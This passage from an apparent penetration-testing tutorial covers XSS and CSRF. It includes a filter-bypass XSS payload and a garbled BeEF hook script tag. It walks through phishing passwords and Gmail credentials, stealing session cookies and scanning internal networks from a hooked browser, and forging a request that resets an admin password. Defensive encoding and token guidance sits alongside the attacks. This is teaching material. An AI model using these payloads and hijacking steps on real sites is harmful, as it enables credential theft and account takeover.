Medium-security filter bypass with <img src='s' onerror=prompt('vulnerable')>.

Switching around the attributes and using delimiters tricks the application into
thinking there is no event handler (starting with on) and that there is only one
attribute.

To eliminate XSS vulnerabilities, a three-rule approach should be
followed. First, it must be thoroughly understood how XSS operates. Anywhere in
an application where user input is passed into responses, whether through POST or
GET requests, requires close examination. This means all in-band channels where
user input is passed, but also out-of-band channels such as SMTP to HTML. User
input must be validated and sanitized, user output must be validated and sanitized,
and dangerous insertion points must be eradicated.
When user input is passed into responses, the relevance of the
response must be taken into account. Length limiting and heavy character
restriction should be applied based on the function being interacted with. Where a
credit card field is only a certain number of digits, only digits should be allowed and
the specific length enforced; email address fields don't need certain special
characters. Any data useful to an attacker needs to be filtered, escaped, and HTML
encoded. HTML encoding user-supplied input gives an assurance that malicious
payloads are not integrated into the structure of the site itself but appear only as
part of the site's visible content. It is preferable that user input is never passed into
event handlers as JavaScript strings, but if it is necessary, then heavy escaping
needs to occur: escape the quotation character and backslash character with
backslashes, then HTML encode the semicolon character and ampersand character
so the attacker cannot perform HTML encoding themselves. Overall, the best
practice is to HTML encode all nonalphanumeric characters. The defense-in-depth
approach of input validation and output validation is necessary to defeat XSS.
There are also insertion points where user-supplied input should never be passed
at all: code contained within event handlers, and existing script code, most notably
script code where URLs are being passed as values, should absolutely not contain
user-supplied input.
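A minimal sketch of that last recommendation, encoding every non-alphanumeric character (the helper name here is made up for illustration):

```python
def encode_non_alnum(s):
    # HTML-encode any character that is not a letter or digit so it
    # cannot participate in tag or attribute syntax.
    return "".join(c if c.isalnum() else "&#x{:x};".format(ord(c)) for c in s)

print(encode_non_alnum("<script>"))  # &#x3c;script&#x3e;
```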
It should be understood that some web applications need actual users
to submit HTML code as input. Regardless, strict rules should be deployed that limit
user-supplied HTML. Where HTML submitted by users is to be rendered, it cannot
simply be HTML encoded, as it would then appear on screen as markup. This
implies that such heavy filtering and encoding cannot be applied universally across
an application like this. In this situation, a strict whitelist of only certain tags and
attributes should be used, and careful measures must be taken to neuter the
allowed HTML so it cannot invoke any scripts.
Securing against DOM-based XSS is tricky, as the input is never
actually passed in the server response; it is built client side by the browser.
Inherently, allowing client-side scripts to pull data from the DOM to build the page
should be avoided as much as possible. Where this must occur, a similar approach
is taken as when securing against stored and reflected attacks: input validation
controls should whitelist alphanumeric characters only, and only one parameter
should be contained in the query string. Output validation once again falls on heavy
encoding so the data can be displayed safely on the page as HTML.
Testing for XSS has been shown extensively, but a penetration tester
would not be taken too seriously if all they showed the company at risk were dialog
boxes popping up. XSS allows the leveraging of very powerful tools that carry their
own payloads, and when such a payload executes, the tool is able to hook into the
user's browser and launch attacks. The BeEF framework will be used to hook into
the victim's browser after the script is executed, effectively allowing the stealing of
credentials and user login sessions, network scanning with firewall bypass, and
Google phishing pages.

The BeEF XSS hooking service is started on port 3000.


The application's functionality is inspected.

A possible area to test for vulnerability, as user input is reflected dynamically on the site.

The payload is pointed at the URL parameter that will be reflectively served to the user:
<script src=</script>

A Windows browser appears as online in the BeEF tool, notifying us remotely that
the injection and hook were successful.


A fake prompt is pushed to the user's browser, telling them to reenter their password to stay logged in.

The hooked browser receives the prompt.

BEEF receives the password.


A fake phishing login is pushed to the user's browser. Notice the domain is not Google, but the vulnerable site.

The user is automatically redirected to the real Google site after submitting the credentials.

BeEF harvests the Gmail credentials successfully.


BeEF is commanded to dump the user's current session cookie. This cookie can be placed into the Cookie header of
an HTTP request to hijack the session without a password.

Other interesting commands are built into the hooking tool for network attacks.
Denial-of-service attacks can be performed, or, more satisfyingly, internal scans of
the user's network. Having the user perform the scans on the attacker's behalf not
only allows the bypass of external firewalls, but lets the attacker map out further
attacks as they find ways to pivot through the network.


Cross-site request forgery aims to force a user of a website to perform
an unintended action on that website by clicking a link placed methodically on
another site. These attacks can persist and succeed where XSS fails; the user only
needs to be manipulated into making a specific request to the already vulnerable
application. URL requests on vulnerable sites that perform powerful functions are
ripe for CSRF when they share three common issues. The first issue that makes
CSRF possible is weak session handling: where there is only a simple HTTP cookie
tracking the session, and no other parameters in place that dictate state, the
requests in question are vulnerable. Secondly, the privileged action in question is
being passed through URL parameters and it is very simple to deduce what the
function is. Thirdly, and though this may be comparable to the weak HTTP cookie,
all parameters needed to execute the action are known to the attacker. An early
defense against crafted URLs from other domains was to validate that what was
actually being requested was what was performed. For example, perhaps an
attacker crafted a site that needed to leverage more power than what simple
<img> tags embedded in a page would afford; to protect against manipulation of a
user on the victim site, the application validated that an actual image was returned.
Unfortunately, attackers simply served an image at validation time and then
switched in a redirect at the time the link was used by the victim.
Essentially, CSRF attacks revolve around the attacker riding the victim
user's session, and with the HTTP cookie being the only check on the user's
session, the session can be ridden very deeply by the attacker. Obviously, a user
needs to be logged in to perform the powerful task the attacker hopes to
accomplish. Authentication is key with CSRF attacks, but it is not necessarily the
user who needs to be logged in under their own account. For example, consider an
application that allows a user to upload files of their choosing and download them
at their convenience. In the realm of CSRF, an attack wouldn't cause a user
authenticated as themselves to download a file that the attacker uploaded, or force
an upload of a file for the attacker to download. More realistically, an attacker could
instead craft a URL that logs the victim in under the attacker's credentials; the
logical step for the attacker is then to upload malicious payloads and get the user
to download them on the attacker's behalf.
Defense against these one-way attacks revolves around the heavy use of
anti-CSRF tokens. These tokens are placed in hidden form fields and sent with the
request, along with the actual session cookie. They must not be easily brute-forced.
When an attacker attempts a forged request, the parameters they supply will not
be sufficient, as they have no way of knowing the tokens linked to the user's
session. Understanding how CSRF works, it is fair to say that a token submitted to
a user in a response should not be identical in subsequent exchanges; if the token
never changes at certain points, much of the benefit of using tokens is nullified.
Many developers have mistakenly relied on using the Referer header to check
whether the request originated from the actual domain. At this point it should be
understood how pointless this check is, as it is trivially spoofed in Burp.
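A minimal sketch of the token pattern (the function names are illustrative): the server issues an unpredictable per-session token, embeds it in the hidden form field, and compares it in constant time on every state-changing request:

```python
import hmac
import secrets

def issue_csrf_token():
    # 32 random bytes: far too large a space to brute force.
    return secrets.token_hex(32)

def verify_csrf_token(session_token, submitted_token):
    # Constant-time comparison; a forged cross-site request cannot
    # supply this value because the attacker never sees the form.
    return hmac.compare_digest(session_token, submitted_token)

token = issue_csrf_token()
print(verify_csrf_token(token, token))    # True: legitimate form post
print(verify_csrf_token(token, "guess"))  # False: forged request rejected
```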
The first step in executing a CSRF attack is to analyze the request URL. It can be
seen that when a user enters a new password, the change function is built into the
URL and can be manipulated via its parameters.

Create a really simple Click here button with the request built into the HTML.

Test the code.

Communicate the link to the admin somehow. Notice the request is hidden in the
link, and the attacker knows the password will be changed to OWNED.


The admin's password gets changed to OWNED.

This is a simple concept, and if the admin were paying attention, they would
probably change the password back to the old one before an attacker could
leverage the access. The real damage is in situations where things are more subtle,
like the adding of a new user or the privileges of a regular user being updated.
Also, imagine if this type of forged request were used not to change passwords, but
to submit funds transfers!

In conclusion, there is such a vast array of attack vectors and
interconnecting technologies in use between applications and browsers that
securing applications is a massive undertaking. There are many more attacks and
vulnerabilities that this project has not covered, but the bread-and-butter security
flaws have been discussed in depth. This project should be useful for beginners and
intermediates alike looking to improve, refresh, and sharpen their penetration
testing skills.

1. Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook:
Discovering and Exploiting Security Flaws. Indianapolis, IN: Wiley Pub., 2008. Print.